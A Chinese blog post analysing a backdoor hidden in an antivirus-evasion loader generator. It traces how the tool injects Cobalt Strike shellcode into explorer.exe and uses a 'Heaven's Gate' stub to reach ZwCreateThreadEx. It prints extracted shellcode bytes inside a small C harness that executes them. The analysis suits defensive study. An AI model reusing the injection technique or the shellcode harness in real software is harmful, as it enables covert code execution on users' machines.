某免杀工具后门分析

admin 2022年11月3日19:08:41安全文章评论14 views6207字阅读20分41秒阅读模式

最近网上看到某免杀exe生成工具存在后门

找到样本来学习一下看看

样本地址: https://s.threatbook.com/report/file/a737860a66bcd9228cc18de7a51cc736e1a834a13e26cd6f19e2d162fdfef9bd

0x01 文件信息

下载好后有2个文件

LoaderMaker.exe

这是用来生成免杀文件的,后门在该文件中

ShellcodeLoader.exe

这是一个模板

这次不学习这东西怎么免杀的

就是看看后门是藏在哪里的

0x02 文件分析

先看一下LoaderMaker.exe的导出函数有哪些

某免杀工具后门分析

看到这个函数就感觉有点问题了

这是用来列进程的函数,一个免杀工具好端端的为啥要去列进程

参考了一下大佬的文章,是逆着推的,后面慢慢说

0x03 废话来喽

首先找到主函数

运行文件后会打印title

某免杀工具后门分析

主函数位置为sub_004019A0

某免杀工具后门分析

打印下面还有2个函数

sub_4011E0

网上说是用来反沙箱的,找了半天找不到特别有用的信息,好像是一个处理字符串的函数

某免杀工具后门分析

可以看到从ntdll里面找PfxInitialize函数,然后对比输出结果是否为0x200

去dbg里面跟了一下

某免杀工具后门分析

发出了疑惑的声音,这不是在硬编码中写死的吗

后来又去ReactOS看了下

某免杀工具后门分析

可以看到函数内部执行了UNIMPLEMENTED,再过去看看

某免杀工具后门分析

可以看到是个宏定义,如果满足上面的条件则调用Dbgprint,反之为空

Dbgprint是内核的打印函数,可以不用去管

这里简单的猜测一下,PfxInitialize的返回值应该是在编译ntdll的时候决定的

返回值和CPU架构有关,勉强可以说是反沙箱的函数,只是不是动态确定的就是了

上面是一些简单的猜测,如果有问题欢迎大佬指出

sub_401620

这函数就是用来直接提权的,里面不细究了之前的文章有写过,开启debug特权,开不起就算了

所以你一个免杀工具为啥要debug特权???

后面的就是混淆shellcode的一些东西了,这脚本的免杀怎么实现的就不在这里说了

毕竟这文章主要是来看后门的

0x04 后门代码分析

这里跟着大佬的脚步逆着推

sub_401560

先找到调用CreateToolhelp32Snapshot的函数

sub_401560

某免杀工具后门分析

毫不掩饰的遍历进程,通过进程名找到PID再用a1传回去

sub_401710

再往上找到sub_401710,这里函数太长了截图不完

某免杀工具后门分析

可以看到sub_401560执行完后如果找到PID就会去执行sub_401290

再看下面的函数之前先去看看到底找了什么进程吧

看上图有一堆不知道什么的变量,还有循环

到这里看伪代码就会有点不清楚了,可以选择直接去看汇编

.text:00401710 var_54          = dword ptr -54h
.text:00401710 var_50 = dword ptr -50h
.text:00401710 var_4C = dword ptr -4Ch
.text:00401710 var_48 = dword ptr -48h
.text:00401710 var_44 = dword ptr -44h
.text:00401710 var_40 = dword ptr -40h
.text:00401710 var_3C = dword ptr -3Ch
.text:00401710 var_38 = dword ptr -38h
.text:00401710 var_34 = dword ptr -34h
.text:00401710 var_30 = dword ptr -30h
.text:00401710 var_2C = dword ptr -2Ch
.text:00401710 var_28 = dword ptr -28h
.text:00401710 String2 = word ptr -24h
.text:00401710 var_20 = dword ptr -20h
.text:00401710 var_1C = dword ptr -1Ch
.text:00401710 var_18 = dword ptr -18h
.text:00401710 var_14 = dword ptr -14h
.text:00401710 var_10 = dword ptr -10h
.text:00401710 var_C = word ptr -0Ch
.text:00401710 dwProcessId = dword ptr -8
.text:00401710 var_4 = dword ptr -4

.text:00401799 mov edx, [ebp+var_4]
.text:0040179C mov eax, [ebp+edx*4+var_54]
.text:004017A0 movsx cx, byte_41ADC4[eax]
.text:004017A8 mov edx, [ebp+var_4]
.text:004017AB mov [ebp+edx*2+String2], cx
.text:004017B0 mov eax, [ebp+var_4]
.text:004017B3 add eax, 1
.text:004017B6 mov [ebp+var_4], eax
.text:004017B9 cmp [ebp+var_4], 0Ch
.text:004017BD jnz short loc_4017D2

上面这些都是参数在栈中对应的位置,稍微把参数对应的位置改一下

先贴一张后面要用到的

某免杀工具后门分析

这里能看到byte_41ADC4对应的字符串

shellcodeLoader.exe

.text:00401799                 mov     edx, [ebp-4]         
;取出ebp-4的位置存入edx 该位置是用来存放循环次数的
.text:0040179C mov eax, [ebp+edx*4-54]
;将ebp+edx*4-54的位置存入eax 该位置是存放需要取的字符串的位置
.text:004017A0 movsx cx, byte_41ADC4[eax]
;取出byte_41ADC4对应位置的字符
.text:004017A8 mov edx, [ebp-4]
;取出ebp-4的位置存入edx
.text:004017AB mov [ebp+edx*2-24], cx
;将得到的字符存入ebp+edx*2-24
.text:004017B0 mov eax, [ebp-4]
;取出循环次数存入eax
.text:004017B3 add eax, 1
;eax+1
.text:004017B6 mov [ebp-4], eax
;加过的循环次数再次存入ebp-4
.text:004017B9 cmp [ebp-4], 0Ch
;判断有无循环到0xC次
.text:004017BD jnz short loc_4017D
;如果已经循环到0xC次跳出循环

这么看了之后就很明了了

上面v1-v12的变量去byte_41ADC4找到对应位置的字符就可以了

其实这里动态调试可以马上看到

某免杀工具后门分析

这里看着还有点不对

再往下看看ida中还有这句

LOWORD(v14) = 112;

某免杀工具后门分析

这里就明确了找的是资源管理器的PID

虽然动态可以直接看到不过有些程序不能调试,所以静态也是必要的技能

好了可以接着看下面的函数了

sub_401290

去找了某dll的句柄

某免杀工具后门分析

这里取字符串的方式和上面的一样,不过取的位置在byte_41AE20

某免杀工具后门分析

byte_41AE20=[A-Za-z]

这里取出的来的字符串为Kernel

加上v23 = 0x320033;

完整的字符串就是Kernel32

得到Kernel32的句柄

然后用OpenProcess得到资源管理器的句柄

然后使用GetProcAddress得到需要调用的函数地址

某免杀工具后门分析

这里有些区别

先提取出dword_41A9E4的数字然后再从byte_41AE20找到指定字符

某免杀工具后门分析

这里提取出来的函数是VirtullAllocEx

下面还有GetProcAddress

某免杀工具后门分析

和上面的一样

某免杀工具后门分析

这里的函数是WriteProcessMemory

先判断系统的位数,如果是64位则注入shellcode,反之就不动

然后开一块堆内存用来解密shellcode

某免杀工具后门分析

关于解密shellcode这块可以写脚本解密,这次偷懒就直接用x64dbg运行了

某免杀工具后门分析

解密了之后可以看到这就是一个普通cs的shellcode,甚至无混淆,直接可以看到域名和端口

端口: 0x827=2087

不过看到FC48就可以知道这是一段x64位的shellcode,不过这个后门程序是32位的该怎么去动64位的程序的还需要看下去

某免杀工具后门分析

后面的代码调用了前面提取出来的函数

就是在explorer.exe开内存然后把shellcode写入explorer.exe的内存中

调用sub_401230开一块内存将sub_41A8B0数据段内的数据复制进去

某免杀工具后门分析

然后执行这段内存

下面看看这段内存是啥用的

0x05 天堂之门

这项技术早有耳闻

以前一直没有研究,没想到在这里碰到了

下面简单说一下这技术,这次先不深入学习了以后再专门的文章

该技术可以在32位的进程里面执行64位的汇编指令

其实32位程序会载入32位和64位的ntdll.dll,可以用ProcessHacker看到

某免杀工具后门分析

由64位的ntdll模拟一个环境让32位的程序可以正常执行

用来区别执行什么位数的指令用的是段寄存器cs

如果cs为0x23则指令为32位,为0x33则为64位

在ida找到数据段按C可以转为汇编代码

某免杀工具后门分析

可以看到call了sub_41A933函数

某免杀工具后门分析

sub_41A933函数push 0x33和eax,这里eax的是call sub_41A933的下一行指令

不过这已经不重要了,因为IDA和dbg都看不清了,到这里已经转成64位的指令了

这里可以用PE-bear简单的查看一下

某免杀工具后门分析

可以把机器码转为不同位数的指令

某免杀工具后门分析

前面说了rerf指针会回到call sub_41A933的下一行指令,就是这位置

不要在意上面的指令为啥不是call,因为这里位数已经改变了

看一下下面的汇编0x60,0x18,这种就是在找PEB里面的dll链表了

因为之前文章有说过这里就不展开了

这块指令就是用来找64位ntdll的地址,然后找里面的某个函数调用

这里可以把机器码全部复制下来然后用x64dbg调试

#include <stdio.h>
#include <Windows.h>

int main() {
char sc[] = "x53x5Bx85xC0x74x67x48x89xE6x48x83xE4xF0x48x83xECx68xB8xFAx80x39x5Ex53x5BxE8x86x00x00x00x48x89xC3x4Dx31xC0x48x31xC0x48x89x44x24x50x53x5Bx48x89x44x24x48x48x89x44x24x40x48x89x44x24x38x53x5Bx48x89x44x24x30x8Bx46x24x48x89x44x24x28x8Bx46x20x48x89x44x24x20x53x5Bx44x8Bx4Ex14xBAx00x00x00x10x8Bx4Ex30x53x5BxFFxD3x48x89xF4xE8x1Cx00x00x00x5Dx5Fx5Ex5BxC3x31xC0x48xF7xD8xC3xE8xF5xFFxFFxFFx74x07x58x6Ax33x53x5Bx50xCBxC3x53x5BxE8xE4xFFxFFxFFx53x5Bx75x10x58x83xECx08x89x04x24xC7x44x24x04x23x00x00x00xCBxC3x56x57x53x51x49x89xC0x6Ax60x5Ex65x48x8Bx06x48x8Bx40x18x53x5Bx4Cx8Bx50x30x53x5Bx49x8Bx6Ax10x48x85xEDx89xE8x74x59x4Dx8Bx12x8Bx45x3Cx83xC0x10x8Bx44x05x78x53x5Bx48x8Dx74x05x18xADx91x67xE3xDCxADx4Cx8Dx5Cx05x00x53x5BxADx48x8Dx7Cx05x00xADx48x8Dx5Cx05x00x53x5Bx8Bx74x8FxFCx48x01xEEx31xC0x99xACx01xC2xC1xC2x05x53x5BxFFxC8x79xF4x44x39xC2xE0xE5x75xACx0FxB7x14x4Bx53x5Bx41x8Bx04x93x48x01xE8x59x5Bx5Fx5ExC3";
void* exec = VirtualAlloc(0, sizeof sc, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, sc, sizeof sc);
((void(*)())exec)();
return 0;

这段代码找函数的方法和cs类似输入一个特征然后去遍历字符串这样的

某免杀工具后门分析

0x5E3980FA这就是特征,找到的函数为ZwCreateThreadEx

这就是该段代码的作用。,找到64位的ZwCreateThreadEx执行之前写入explorer.exe的shellcode

至于参数是从栈里面传过来的,因为实在不好调试所以就不调了

总结一下就是

找到explorer.exe的pid->开辟内存->写入x64的shellcode->找到x64的ZwCreateThreadEx函数执行shellcdoe

最后的问题就是这个后门是在哪里触发的

找到是谁调用了sub_401710

某免杀工具后门分析

这里有个计数器dword_41B870

如果等于6就触发后门,不等于就自加

再往上找,因为很多就不截图了直接列一下函数调用顺序

sub_401950(打印字符串的函数)->sub_401930->sub_401910->sub_4018F0->sub_4018D0->sub_4018B0->sub_401890->sub_401870->sub_401850->sub_401830->sub_401800

不要看有这么一串调用栈,其实这些函数里面基本就是类似的,如下

int __cdecl sub_401930(int a1)
{
sub_401910(a1);
return a1;
}

就直接调用

有可能和编译器有关系

最后会发现这是用来打印的函数

某免杀工具后门分析

上面打印了5次

如果参数不够在if的代码块里置零,这样后面的四次打印就不会触发后门

参数正确的话会在最后打印output时候触发后门

某免杀工具后门分析

意思就是在如果不生成就不会被上线

生成了就上线

番外

为了确认文章的准确性特意去调了一下那段shellcode,发现了有意思的东西*

如果下载到的样本是未被修改的话

这段shellcode无法上线

在调试的时候发现InternetOpenA需要调用的参数全是空

某免杀工具后门分析

说明shellcode到这里就崩溃了

去附参数的位置看看发现已经全部都置零了

某免杀工具后门分析

找了文章发现提取出来的shellcode是一样的

去看了一下沙箱的信息,虽然说提取到了恶意的url不过好像也无可疑的http请求

再去看了一下聊天记录的截图好像连接的也不是提取到的地址

所以可能这东西真的不能上线..只是作者逗着玩的

0x06 参考文章

https://citrusice.github.io/posts/shellcode-loader-backdoor-analysis/



关 注 有 礼



欢迎关注公众号:网络安全者

后台回复:20221103

获取每日抽奖送书

       

本文内容来自网络,如有侵权请联系删除

某免杀工具后门分析


原文始发于微信公众号(网络安全者):某免杀工具后门分析

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月3日19:08:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  某免杀工具后门分析 http://cn-sec.com/archives/1387523.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: